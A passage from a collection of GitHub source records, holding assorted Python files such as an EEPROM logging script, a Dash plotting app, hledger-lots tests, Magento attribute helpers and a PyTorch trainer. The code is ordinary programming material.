range(0, 8, 2)]\r\n\r\n\r\n'''\r\n\r\n関数 write_to_eeprom\r\n1データ分(5バイト)の書き込みを行う関数。spilt_listで得た長さ4の整数型リストの4要素(\r\n1桁もしくは2桁整数)を前半4バイトに書き込み、5バイト目にdot_posiを書き込む。この5バイト\r\nを1つの気圧値を記憶する領域となる。\r\n'''\r\ndef write_to_eeprom(lis):\r\n global addr\r\n for i in range (len(lis)):\r\n intdata = lis[i]\r\n #print(intdata)\r\n writeData(intdata)\r\n addr += 1\r\n #print(\"dataADDRESS=\",addr)\r\n writeData(int(dot_posi)) \r\n addr += 1\r\n time.sleep(0.1)\r\n #print(\"dotADDRESS=\",addr)\r\n\r\n'''------------------関数定義の終わり----------------------------------'''\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#########################################################\r\n\r\n\r\n\r\nfor i in range(count):\r\n \r\n list1 = format_decimal(read_adc())\r\n #print(\"a:\",list1)\r\n '''list1 = ['1','0','0','6','.','5','5','1','0'] データを小数点を含め長さ9のリストのstr型要素に変換。'''\r\n detect_dot(list1) #dot_posiの更新 ここで小数点の位置をdot_posiに代入している\r\n list2 = exclude_dot(list1)\r\n #print(\"b:\",list2)\r\n #print(\"dot:\",dot_posi)\r\n '''list2 = ['1','0','0','6','5','5','1','0'] リストから小数点を除外。要素数が8になる。'''\r\n list3 = split_list(list2)\r\n #print(\"c:\",list3)\r\n '''list3 = [10,6,55,10] 2要素ごとに分割したものを整数型に変換し、新たに長さ4のリストを作成'''\r\n write_to_eeprom(list3)\r\n '''1byte~4byte目にlist3の整数要素を、5byte目にdot_posiを書き込む。\r\n これで気圧値1006.551がeepromに保存されたことになる。'''\r\n #print(\"writed_address!!\",i)\r\n \r\n if FP.value() == 1:\r\n t = 100\r\n #print(\"FP\")\r\n pass\r\n \r\n elif addr >= 0xFFFF:\r\n k = 1\r\n addr = 0x0000\r\n continue\r\n \r\n \r\n\r\n \r\n\r\n \r\n#print(\"write cycle over !!\")\r\n########################################################\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"PLANET-Qdeveloper/NSE2023_MISSION","sub_path":"EEPROM読み書き試験(ADC使用).py","file_name":"EEPROM読み書き試験(ADC使用).py","file_ext":"py","file_size_in_byte":9667,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32677922323","text":"#!/usr/bin/env python\nimport sys\nimport csv\nimport json\nimport fileinput\n\ndef main(argv):\n args = argv[1:]\n fp = fileinput.input(args)\n keys = None\n a = []\n for row in csv.reader(fp):\n if keys is None:\n keys = row\n else:\n obj = dict(zip(keys, row))\n a.append(obj)\n print(json.dumps(a))\n return 0\n\nif __name__ == '__main__': sys.exit(main(sys.argv))\n","repo_name":"euske/slides","sub_path":"sem20190914/csv2json.py","file_name":"csv2json.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"24397416267","text":"import pathlib\nimport sys\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom matplotlib.ticker import FormatStrFormatter\n\nsns.set_context(\"paper\")\n\nKEYS = (\"Volumetric Strain\",\n \"Normalized Surface Area Change\",\n \"Deformed Surface Area to Volume\")\n\nTITLES = (\"Volumetric Strain\",\n \"Normalized Surface Area Change\",\n \"Surface Area to Volume Ratio\")\n\n\ndef main(filename):\n file = pathlib.Path(filename)\n dataframe = pd.read_excel(file)\n fig, axs = plt.subplots(len(KEYS), 1, sharex=True, figsize=(4, 6))\n for i, key in enumerate(KEYS):\n dataframe.boxplot(column=[key], by=\"Time\", notch=True, showfliers=False,\n grid=False, ax=axs[i],\n color=dict(boxes='k', whiskers='k',\n medians='k'))\n axs[i].set_title(TITLES[i])\n axs[i].yaxis.set_major_formatter(FormatStrFormatter('%0.3f'))\n if i < len(KEYS) - 1:\n axs[i].set_xlabel(\"\")\n else:\n axs[i].set_xlabel(\"Time (min)\")\n fig.suptitle(\"\")\n plt.tight_layout()\n plt.savefig(filename.replace(\".xlsx\", \"_boxplot.svg\"))\n\n\nif __name__ == \"__main__\":\n main(sys.argv[-1])\n","repo_name":"siboles/resonant_lsm","sub_path":"src/scripts/boxplot.py","file_name":"boxplot.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43135012078","text":"import os\nimport plotly.graph_objects as go\n\nimport dash\nfrom dash import dcc\nfrom dash import html\nimport dash_bootstrap_components as dbc\nimport numpy as np\nimport math\nimport gspread\n\n\n\nX = []\nY = []\nZ = []\nT = []\n\nX_input = []\nY_input = []\nT_input = []\nZ_input = []\n\nx_min=0\nx_max=0\ny_max=0\ny_min=0\nz_min=0\nz_max=0\n\n# ---------- Initialize X, Y, Z ----------\ndef f(x, y, t):\n return (math.sin(x * x + y * y) /(x * x+0.1 + y * y+0.1))+ t\n\n\n\ndef calculate(X,Y,Z,t):\n for i in np.arange(len(X)):\n for j in np.arange(len(Y)):\n Z[i][j] = f(X[i], Y[j],t)\n\n\n\n# ---------- Generate graphs ----------\nlayout = {'title': {'text': '3D'}}\n\nfig = go.Figure(data=[go.Surface()], layout=layout)\n\n# ---------- Display ----------\n\napp = dash.Dash()\napp.title = \"Steepest Descent\"\n\nserver = app.server\n\nbadge = dbc.Button(\n [\n \"Start\",\n dbc.Badge(\"\", color=\"light\", text_color=\"primary\", className=\"ms-1\"),\n ],\n color=\"primary\",\n)\napp.layout = html.Div([\n # graph\n html.Div( # size of plot in style\n #children=[dcc.Graph(id='my-graph', figure=fig, style={'width': '50vh', 'height': '50vh', 'display':'inline-block'})]\n dcc.Graph(id='my-graph', figure=fig, style={'width': '50vh', 'height': '50vh', 'display':'inline-block'})\n ),\n # slider\n\n\n dcc.Slider(\n id='my-slider',\n min=0,\n max=0,\n step=0,\n value=0,\n\n marks={},\n ),\n\n html.Div(id='slider-output-container'),\n\n # button\n # x\n html.Div(dcc.Input(id='inputX_start', type='number', placeholder=\"x_start=\")),\n html.Div(dcc.Input(id='inputX_change', type='number', placeholder=\"x_change=\")),\n html.Div(dcc.Input(id='inputX_end', type='number', placeholder=\"x_end=\")),\n\n # y\n html.Div(dcc.Input(id='inputY_start', type='number', placeholder=\"y_start=\")),\n html.Div(dcc.Input(id='inputY_change', type='number', placeholder=\"y_change=\")),\n html.Div(dcc.Input(id='inputY_end', type='number', placeholder=\"y_end=\")),\n\n # t\n\n html.Div(dcc.Input(id='inputT_start', type='number', placeholder=\"t_start=\")),\n html.Div(dcc.Input(id='inputT_change', type='number', placeholder=\"t_change=\")),\n html.Div(dcc.Input(id='inputT_end', type='number', placeholder=\"t_end=\")),\n\n\n html.Div(id='container', children=''),\n\n html.Button('Submit', id='submit', n_clicks=0),\n\n]\n\n)\n\n\n@app.callback(\n dash.dependencies.Output('container', 'children'),\n dash.dependencies.Input('submit', 'n_clicks'),\n [dash.dependencies.State('inputX_start', 'value'),\n dash.dependencies.State('inputX_change', 'value'),\n dash.dependencies.State('inputX_end', 'value'),\n dash.dependencies.State('inputY_start', 'value'),\n dash.dependencies.State('inputY_change', 'value'),\n dash.dependencies.State('inputY_end', 'value'),\n dash.dependencies.State('inputT_start', 'value'),\n dash.dependencies.State('inputT_change', 'value'),\n dash.dependencies.State('inputT_end', 'value'),\n ],\n)\n\n\ndef update_output(n_clicks, x_start, x_change, x_end, y_start, y_change, y_end, t_start, t_change, t_end):\n # так можно доставать вытащить значения для callback элемента.\n # X=value\n # print(X)\n if not n_clicks:\n return( x_start, x_change, x_end, y_start, y_change, y_end, t_start, t_change, t_end)\n\n print(x_start)\n print(x_change)\n print(x_end)\n X_input.clear()\n Y_input.clear()\n T_input.clear()\n for i in np.arange(x_start, x_end+x_change, x_change):\n X_input.append(round(i,5))\n for i in np.arange(y_start, y_end+y_change, y_change):\n Y_input.append(round(i,5))\n for i in np.arange(t_start, t_end+t_change, t_change):\n T_input.append(round(i,5))\n\n\n x_max = x_start\n x_min = x_end\n y_max = y_start\n y_min = y_end\n\n\n #fig.update_xaxes(range=[x_start, x_end])\n #fig.update_yaxes(range=[y_start, y_end])\n\n\n return 'The input value was {}_____{}_____{}_____{}_____{}_____{}_____{}_____{}_____{}_____ '.format(\n round(x_start,5), round(x_change,5), round(x_end,5),round(y_start,5), round(y_change,5), round(y_end,5), round(t_start,5), round(t_change,5), round(t_end, 5), n_clicks\n\n\n )\n\n\n@app.callback(\n dash.dependencies.Output(\"my-slider\", \"min\"),\n dash.dependencies.Output(\"my-slider\", \"max\"),\n dash.dependencies.Output(\"my-slider\", \"value\"),\n dash.dependencies.Output(\"my-slider\", \"step\"),\n dash.dependencies.Output(\"my-slider\", \"marks\"),\n dash.dependencies.Input(\"submit\", \"n_clicks\"),\n dash.dependencies.State(\"my-slider\", \"min\"),\n dash.dependencies.State(\"my-slider\", \"max\"),\n dash.dependencies.State(\"my-slider\", \"value\"),\n dash.dependencies.State(\"my-slider\", \"step\"),\n dash.dependencies.State(\"my-slider\", \"marks\"),\n dash.dependencies.State('inputT_start', 'value'),\n dash.dependencies.State('inputT_change', 'value'),\n dash.dependencies.State('inputT_end', 'value'),\n)\ndef update_slider(nClicks, sliderMin, sliderMax, sliderValue, sliderStep, sliderMarks,t_start, t_change, t_end):\n\n if not nClicks:\n return (sliderMin, sliderMax, sliderValue,sliderStep, sliderMarks)\n\n if isinstance(t_change, int):\n return (t_start, t_end, 0, t_change, {i: '{}'.format(i) for i in range(t_start, t_end + t_change, t_change)})\n else:\n return (t_start, t_end, 0, t_change, {i: '{}'.format(i) for i in np.arange(t_start, t_end + t_change, t_change)})\n\n\n\n# slider callback for t . graphic\n@app.callback(\n dash.dependencies.Output('slider-output-container', 'children'),\n dash.dependencies.Input('my-slider', 'value')\n)\ndef update_output(value):\n # printedvalue=value\n # print(printedvalue)\n return 'You have selected t=\"{}\"'.format(value)\n\n\n@app.callback(dash.dependencies.Output('my-graph', 'figure'),\n [dash.dependencies.Input('my-slider', 'value')]\n )\ndef update_graph(value):\n\n tvalue = value\n\n Z_input = np.zeros((len(X_input), len(Y_input)))\n\n X = X_input\n Y = Y_input\n\n Z = Z_input\n print('Z_input=', Z_input)\n calculate(X, Y, Z, tvalue)\n print('X=', X)\n print('Y=', Y)\n print('Z=', Z)\n # print('X size =', len(X))\n # print('Y size=', len(Y))\n # print('Z size=', len(Z))\n Z_transpose =Z.transpose()\n\n # z_min = Z_transpose[0]\n # z_max = Z_transpose[-1]\n # fig = go.Figure(data=[go.Surface(x=X, y=Y, z=Z)], go.Layout(\n #\n #\n # ))\n\n\n fig = go.Figure(data=[go.Surface(x=X, y=Y, z= Z_transpose)], layout=layout)\n\n # fig.update_layout(go.Layout(\n # autosize=False,\n #\n # xaxis=dict(range=[-10, 10],autorange=False),\n # yaxis=dict(range=[-4, 4],autorange=False),\n #\n # title=\"Start Title\"\n # ))\n if (len(X) != 0 and len(Y) != 0 and len(Z) != 0):\n asp_x = X[-1]\n asp_y = Y[-1]\n asp_z = abs(max(max(x) for x in Z_transpose))\n #print('Z_transpose',Z_transpose[-1])\n if (len(X) != 0 and len(Y) != 0 and len(Z) != 0):\n fig.update_layout(\n scene=dict(\n xaxis=dict(nticks=4, range=[X[0], X[-1]], ),\n yaxis=dict(nticks=4, range=[Y[0], Y[-1]], ),\n zaxis=dict(nticks=4, range=([Z_transpose[0], Z_transpose[-1]]), ),\n #aspectmode='manual', #try to find good aspectmode to fix xyz size\n\n\n aspectratio=dict(x=asp_x, y=asp_y, z=asp_x),\n ),\n width=700,\n\n\n )\n name = 'default'\n camera = dict(\n eye=dict(x=asp_x, y=asp_y, z=asp_x)\n )\n\n fig.update_layout(scene_camera= camera, title=name)\n return fig\n\n\nif __name__ == '__main__':\n app.run_server(debug=True, use_reloader=False)","repo_name":"devreon/server-client","sub_path":"visualisation.py","file_name":"visualisation.py","file_ext":"py","file_size_in_byte":7665,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22428691345","text":"from hledger_lots import lib\nfrom hledger_lots.lib import AdjustedTxn\nimport pytest\nfrom datetime import date\nimport pyxirr\n\n\nclass TestGetAvg:\n def test_empty_list(self):\n assert lib.get_avg_fifo([]) == 0\n\n def test_single_txn(self):\n txn = AdjustedTxn(\n date=\"2022-01-01\", price=100.0, base_cur=\"USD\", qtty=10.0, acct=\"1234\"\n )\n assert lib.get_avg_fifo([txn]) == 100.0\n\n def test_multiple_txns(self):\n txns = [\n AdjustedTxn(\n date=\"2022-01-01\", price=100.0, base_cur=\"USD\", qtty=10.0, acct=\"1234\"\n ),\n AdjustedTxn(\n date=\"2022-01-02\", price=150.0, base_cur=\"USD\", qtty=5.0, acct=\"1234\"\n ),\n AdjustedTxn(\n date=\"2022-01-03\", price=200.0, base_cur=\"USD\", qtty=20.0, acct=\"1234\"\n ),\n ]\n assert lib.get_avg_fifo(txns) == pytest.approx(164.28, abs=1e-2)\n\n def test_zero_quantity(self):\n txns = [\n AdjustedTxn(\n date=\"2022-01-01\", price=100.0, base_cur=\"USD\", qtty=10.0, acct=\"1234\"\n ),\n AdjustedTxn(\n date=\"2022-01-02\", price=150.0, base_cur=\"USD\", qtty=0.0, acct=\"1234\"\n ),\n AdjustedTxn(\n date=\"2022-01-03\", price=200.0, base_cur=\"USD\", qtty=20.0, acct=\"1234\"\n ),\n ]\n assert lib.get_avg_fifo(txns) == pytest.approx(166.67, abs=1e-2)\n\n\n\nclass TestGetXirr:\n txns = [\n AdjustedTxn(\"2023-01-23\", 100, \"USD\", -1, \"acct\"),\n AdjustedTxn(\"2023-02-23\", 100, \"USD\", -1, \"acct\"),\n ]\n \n def test_xirr_ok(self):\n assert lib.get_xirr(101,date(2023,3,23),self.txns) == pytest.approx(0.0828, abs=1e-4)\n\n def test_xirr_only_negatives(self):\n with pytest.raises(pyxirr.InvalidPaymentsError):\n lib.get_xirr(0,date(2023,3,23),self.txns)\n\n def test_xirr_empty(self):\n lib.get_xirr(0,date(2023,3,23),[]) == None\n\n def test_xir_negative(self):\n assert lib.get_xirr(99,date(2023,3,23),self.txns) == pytest.approx(-0.0772, abs=1e-4)\n \n\n\n \n \n","repo_name":"edkedk99/hledger-lots","sub_path":"tests/test_lib.py","file_name":"test_lib.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"40248504884","text":"# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n def levelOrder(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[List[int]]\n \"\"\"\n if root ==[]:\n return []\n res = []\n tmp_r = [root.val]\n cur_stack = [root]\n while len(cur_stack) != 0:\n res.append(tmp_r)\n tmp_r = []\n pre_stack = cur_stack\n cur_stack = []\n\n while pre_stack != []:\n cur = pre_stack.pop()\n if cur.left != None:\n cur_stack.append(cur.left)\n tmp_r.append(cur.left.val)\n if cur.right != None:\n cur_stack.append(cur.right)\n tmp_r.append(cur.right.val)\n return res\n\n\n\n","repo_name":"crystalbai/Algorithm","sub_path":"Apple/Binary Tree Level Order Traversal.py","file_name":"Binary Tree Level Order Traversal.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24602445419","text":"from . import db\r\nfrom flask_login import UserMixin\r\n\r\ncursor = db.cursor()\r\n\r\n\r\nclass User(UserMixin):\r\n def __init__(self, id, cpf, nome, siape, email, senha, cppd, nivelcap):\r\n self.id = id\r\n self.cpf = cpf\r\n self.nome = nome\r\n self.siape = siape\r\n self.email = email\r\n self.senha = senha\r\n self.cppd = cppd\r\n self.nivelcap = nivelcap\r\n \r\n def get_id(self):\r\n return self.id\r\n \r\n def is_authenticated(self):\r\n return True\r\n\r\ndef docente_cookie(id):\r\n cursor.execute(\"\"\"SELECT * FROM docente WHERE id=%s\"\"\", (id,))\r\n record = cursor.fetchone()\r\n return User(record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7]) \r\n \r\n\r\n \r\n","repo_name":"Argentaa/ppi","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19748076801","text":"# 9. Write a simple quiz game that has a list of ten questions and a list of\r\n# answers to those questions. The game should give the player four randomly\r\n# selected questions to answer. It should ask the questions one-by-one, and tell the\r\n# player whether they got the question right or wrong. At the end it should print out\r\n# how many out of for they got right.\r\n\r\nquestions = [\r\n \"What's 9+10?: \",\r\n \"What is Victoria's Secret?: \",\r\n \"What again is 9+10?: \"\r\n]\r\n\r\nanswers = [\r\n \"21\",\r\n \"secret\",\r\n \"19\"\r\n]\r\n\r\nscore = 0\r\nprint(\"Welcome to My Super Simple Quiz!\")\r\nfor i in range(len(questions)):\r\n user = input(questions[i]).lower()\r\n if user == answers[i]:\r\n score += 1\r\n print(\"Correct!\")\r\n else:\r\n print(f\"Wrong! The answer is {answers[i]}\")\r\nprint(f\"Congrats you got {score} correct! \")","repo_name":"gregorioacerussell/CPEN60-Laboratory-Manual","sub_path":"8.7 Exercises/(9) 8.7 Exercise.py","file_name":"(9) 8.7 Exercise.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27223476579","text":"import functools\nimport signal\nimport inspect\nimport threading\n\nfrom loguru import logger\n\ntry:\n getargspec = inspect.getfullargspec\nexcept AttributeError: # python 2\n getargspec = inspect.getargspec\n\n\nCONTEXT = threading.local()\nCONTEXT.is_dist_safe = True\nCONTEXT.stack_level = 0\n\n\ndef eco_method(function=None, **kwargs):\n \"\"\"Decorator that injects the current backend as variable ``np`` into the wrapped function.\n\n .. note::\n\n This decorator should be applied to all functions that make use of the computational\n backend (even when subclassing :class:`eco.Veros`). The first argument to the\n decorated function must be a Veros instance.\n\n Example:\n >>> from eco import Veros, eco_method\n >>> \n >>> class MyModel(Veros):\n >>> @eco_method\n >>> def set_topography(self):\n >>> self.kbot[...] = np.random.randint(0, self.nz, size=self.kbot.shape)\n\n \"\"\"\n if function is not None:\n narg = 1 if _is_method(function) else 0\n return _eco_method(function, narg=narg)\n\n inline = kwargs.pop('inline', False)\n dist_safe = kwargs.pop('dist_safe', True)\n\n if not dist_safe and 'local_variables' not in kwargs:\n raise ValueError('local_variables argument must be given if dist_safe=False')\n\n local_vars = kwargs.pop('local_variables', [])\n dist_only = kwargs.pop('dist_only', False)\n\n def inner_decorator(function):\n narg = 1 if _is_method(function) else 0\n return _eco_method(\n function, inline=inline, narg=narg,\n dist_safe=dist_safe, local_vars=local_vars, dist_only=dist_only\n )\n\n return inner_decorator\n\n\ndef _is_method(function):\n spec = getargspec(function)\n return spec.args and spec.args[0] == 'self'\n\n\ndef _eco_method(function, inline=False, dist_safe=True, local_vars=None,\n dist_only=False, narg=0):\n @functools.wraps(function)\n def eco_method_wrapper(*args, **kwargs):\n from . import runtime_settings as rs, runtime_state as rst\n from .backend import flush, get_backend\n from .state import ecoState\n from .state_dist import DistributedecoState\n from .distributed import broadcast\n\n if not inline:\n logger.trace(\n '{}> {}:{}',\n '-' * CONTEXT.stack_level,\n inspect.getmodule(function).__name__,\n function.__name__\n )\n CONTEXT.stack_level += 1\n\n eco_state = args[narg]\n\n if not isinstance(eco_state, ecoState):\n raise TypeError('first argument to a eco_method must be subclass of VerosState')\n\n reset_dist_safe = False\n if not CONTEXT.is_dist_safe:\n assert isinstance(eco_state, DistributedVerosState)\n elif not dist_safe and rst.proc_num > 1:\n reset_dist_safe = True\n\n if reset_dist_safe:\n dist_state = DistributedVerosState(eco_state)\n dist_state.gather_arrays(local_vars)\n func_state = dist_state\n CONTEXT.is_dist_safe = False\n else:\n func_state = eco_state\n\n execute = True\n if not CONTEXT.is_dist_safe:\n execute = rst.proc_rank == 0\n\n g = function.__globals__\n sentinel = object()\n\n oldvalue = g.get('np', sentinel)\n g['np'] = get_backend(rs.backend)\n\n newargs = list(args)\n newargs[narg] = func_state\n\n res = None\n try:\n if execute:\n res = function(*newargs, **kwargs)\n except:\n if reset_dist_safe:\n CONTEXT.is_dist_safe = True\n raise\n else:\n if reset_dist_safe:\n CONTEXT.is_dist_safe = True\n res = broadcast(eco_state, res)\n dist_state.scatter_arrays()\n finally:\n if oldvalue is sentinel:\n del g['np']\n else:\n g['np'] = oldvalue\n\n if not inline:\n CONTEXT.stack_level -= 1\n flush()\n\n return res\n\n return eco_method_wrapper\n\n\ndef dist_context_only(function):\n @functools.wraps(function)\n def dist_context_only_wrapper(vs, arr, *args, **kwargs):\n from . import runtime_state as rst\n\n if rst.proc_num == 1 or not CONTEXT.is_dist_safe:\n # no-op for sequential execution\n return arr\n\n return function(vs, arr, *args, **kwargs)\n\n return dist_context_only_wrapper\n\n\ndef do_not_disturb(function):\n \"\"\"Decorator that catches SIGINT and SIGTERM signals (e.g. after keyboard interrupt)\n and makes sure that the function body is executed before exiting.\n\n Useful e.g. for ensuring that output files are written properly.\n \"\"\"\n signals = (signal.SIGINT, signal.SIGTERM)\n\n @functools.wraps(function)\n def dnd_wrapper(*args, **kwargs):\n old_handlers = {s: signal.getsignal(s) for s in signals}\n signal_received = {'sig': None, 'frame': None}\n\n def handler(sig, frame):\n if signal_received['sig'] is None:\n signal_received['sig'] = sig\n signal_received['frame'] = frame\n logger.error('Signal {} received - cleaning up before exit', sig)\n else:\n # force quit if more than one signal is received\n old_handlers[sig](sig, frame)\n\n for s in signals:\n signal.signal(s, handler)\n\n try:\n res = function(*args, **kwargs)\n\n finally:\n for s in signals:\n signal.signal(s, old_handlers[s])\n sig = signal_received['sig']\n if sig is not None:\n old_handlers[sig](signal_received['sig'], signal_received['frame'])\n\n return res\n\n return dnd_wrapper\n","repo_name":"cbrockw/ecosys3D","sub_path":"ecosys3D/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":5825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4280375118","text":"\"\"\"\nCustom attributes utilities.\n\"\"\"\nfrom collections import OrderedDict\nfrom typing import Callable, Optional, cast, Dict, Any, Union, Sequence, List, Tuple, Iterable, \\\n OrderedDict as OrderedDictType, overload, TypeVar\n\nT = TypeVar('T')\n\n\n@overload\ndef get_custom_attribute(item: dict, attribute_code: str,\n coerce_as: Callable[[str], T]) -> Union[None, T, List[T]]:\n ...\n\n\n@overload\ndef get_custom_attribute(item: dict, attribute_code: str) -> Union[None, str, List[str]]:\n ...\n\n\ndef get_custom_attribute(item, attribute_code, coerce_as=None):\n \"\"\"\n Get a custom attribute from an item given its code.\n\n For example:\n >>> get_custom_attribute(..., \"my_custom_attribute\")\n \"0\"\n\n >>> get_custom_attribute(..., \"my_custom_attribute\", bool)\n False\n\n :param item:\n :param attribute_code:\n :param coerce_as: optional callable that is called on the attribute value if it's set.\n This is useful to circumvent Magento's limitation where all attribute values are strings.\n :return: attribute value or None.\n \"\"\"\n if coerce_as == bool:\n # \"0\" -> False / \"1\" -> True\n coerce_as = lambda s: bool(int(s))\n\n for attribute in item.get(\"custom_attributes\", []):\n if attribute[\"attribute_code\"] == attribute_code:\n value: Union[str, List[str]] = attribute[\"value\"]\n if coerce_as is None:\n return value\n\n if isinstance(value, list):\n return [coerce_as(s) for s in value]\n\n return coerce_as(value)\n return None\n\n\ndef get_boolean_custom_attribute(item: dict, attribute_code: str) -> Optional[bool]:\n \"\"\"\n Equivalent of ``get_custom_attribute(item, attribute_code, coerce_as=bool)`` with proper typing.\n \"\"\"\n return cast(Optional[bool], get_custom_attribute(item, attribute_code, coerce_as=bool))\n\n\ndef get_custom_attributes_dict(item: Dict[str, Any]) -> OrderedDictType[str, Union[Sequence[str], str]]:\n \"\"\"\n Get all custom attributes from an item as an ordered dict of code->value.\n \"\"\"\n d = OrderedDict()\n for attribute in item.get(\"custom_attributes\", []):\n d[attribute[\"attribute_code\"]] = attribute[\"value\"]\n\n return d\n\n\ndef serialize_attribute_value(value: Union[str, int, float, bool, None], force_none=False):\n \"\"\"\n Serialize a value to be stored in a Magento attribute.\n \"\"\"\n if isinstance(value, bool):\n return \"1\" if value else \"0\"\n elif value is None:\n if force_none:\n return None\n return \"\"\n return str(value)\n\n\ndef set_custom_attribute(item: dict, attribute_code: str, attribute_value: Union[str, int, float, bool, None],\n *, force_none=False):\n \"\"\"\n Set a custom attribute in an item dict.\n\n For example:\n >>> set_custom_attribute({}, \"my_custom_attribute\", 42)\n >>> set_custom_attribute({}, \"my_custom_attribute\", False)\n\n :param item: item dict. It’s modified in-place.\n :param attribute_code:\n :param attribute_value:\n :param force_none: by default, the attribute value ``None`` is serialized as an empty string. Setting this parameter\n to ``True`` forces this attribute value to ``None`` instead. This can be used to delete attributes.\n :return: the modified item dict.\n \"\"\"\n return set_custom_attributes(item, [(attribute_code, attribute_value)], force_none=force_none)\n\n\ndef set_custom_attributes(item: dict, attributes: Iterable[Tuple[str, Union[str, int, float, bool, None]]],\n *, force_none=False):\n \"\"\"\n Set custom attributes in an item dict.\n Like ``set_custom_attribute`` but with an iterable of attributes.\n\n :param item: item dict. It’s modified in-place.\n :param attributes: iterable of label/value attribute tuples\n :param force_none: see ``set_custom_attribute`` for usage.\n :return: the modified item dict.\n \"\"\"\n item_custom_attributes: List[Dict[str, str]] = item.get(\"custom_attributes\", [])\n\n attributes_index = {attribute[\"attribute_code\"]: index for index, attribute in enumerate(item_custom_attributes)}\n\n for attribute_code, attribute_value in attributes:\n serialized_value = serialize_attribute_value(attribute_value, force_none=force_none)\n\n if attribute_code in attributes_index:\n index = attributes_index[attribute_code]\n item_custom_attributes[index][\"value\"] = serialized_value\n else:\n attributes_index[attribute_code] = len(item_custom_attributes)\n item_custom_attributes.append({\n \"attribute_code\": attribute_code,\n \"value\": serialized_value,\n })\n\n item[\"custom_attributes\"] = item_custom_attributes\n\n return item\n","repo_name":"Bixoto/PyMagento","sub_path":"magento/attributes.py","file_name":"attributes.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"16995994291","text":"import numpy as np\nimport helper\nimport os\nimport scipy.misc\nimport cv2\nfrom glob import glob\nnp.set_printoptions(threshold=np.nan)\n\nimage_shape = (160, 576)\n\n# data_dir = './data'\n# image_path = './data/data_road/training/gt_image_2/umm_road_000082.png'\n# gt_image = scipy.misc.imresize(scipy.misc.imread(image_path), image_shape)\n# # gt_image = cv2.cvtColor(gt_image, cv2.COLOR_BGR2RGB)\n# background_color = np.array([255, 0, 0])\n# gt_bg = np.all(gt_image == background_color, axis=2)\n# gt_bg = gt_bg.reshape(*gt_bg.shape, 1)\n# print(gt_bg.shape)\n# gt_image = np.concatenate((gt_bg, np.invert(gt_bg)), axis=2)\n#\n# get_batches_fn = helper.gen_batch_function(os.path.join(data_dir, 'data_road/training'), image_shape)\n# a, b = get_batches_fn(1)\n\ndata_dir = './data'\nimg_dir = os.path.join(data_dir, 'data_semantics/training/image_2')\nimage_paths = glob(os.path.join(img_dir, '*.png'))\nlabel_dir = os.path.join(data_dir, 'data_semantics/training/semantic')\nlabel_paths = glob(os.path.join(label_dir, '*.png'))\nlabel_dict = {os.path.basename(path) : path for path in label_paths}\n\n# labels people:24 bike:30 car:25 road:9 others:\n# people:0 bike:1 car:2 road:3 others:4\n\nimg = image_paths[0]\ngt_image_file = label_dict[os.path.basename(img)]\nprint(img)\nprint(gt_image_file)\n\nimg = cv2.imread(gt_image_file)\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\ncv2.imshow('img', img)\ncv2.waitKey(0)\n\ndata_folder = './data/data_semantics/training/image_2'\nimage_paths = glob(os.path.join(data_folder, 'image_2', '*.png'))\nprint(image_paths)","repo_name":"lb5160482/Road-Semantic-Segmentation","sub_path":"playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"69964120490","text":"import logging\nfrom copy import deepcopy\nfrom dataclasses import dataclass\nfrom typing import Callable, Dict, Optional, Union\nfrom copy import deepcopy\n\nimport torch\nfrom torch import nn\nfrom torch.optim import Optimizer\nfrom torch.optim.lr_scheduler import _LRScheduler\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom fed_distill.train.tester import get_batch_accuracy\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass Trainer:\n \"\"\"\n Class for training a model\n \"\"\"\n\n model: nn.Module # model to train\n criterion: nn.Module # loss function\n optimizer: Optimizer # optimizer\n scheduler: _LRScheduler # learning rate scheduler\n loader: DataLoader # training loader\n accuracy_criterion: Optional[\n Callable[[nn.Module], float]\n ] = None # accuracy to compute after each iteration and perform model selection, if any\n device: Union[str, torch.device] = \"cuda\" # device to run training on\n\n def __post_init__(self):\n self.criterion.to(self.device)\n self.model.to(self.device)\n self._metrics = {\"training_loss\": [], \"training_acc\": []}\n\n if self.accuracy_criterion:\n self._metrics[\"test_acc\"] = []\n self._metrics[\"best_model\"] = []\n self.best_acc = 0\n\n def _train_epoch(self) -> None:\n self.model.train()\n epoch_loss = 0\n epoch_acc = 0\n num_samples = 0\n for images, labels in self.loader:\n images = images.to(self.device)\n labels = labels.to(self.device)\n\n self.optimizer.zero_grad()\n prediction = self.model(images)\n loss = self.criterion(prediction, labels)\n 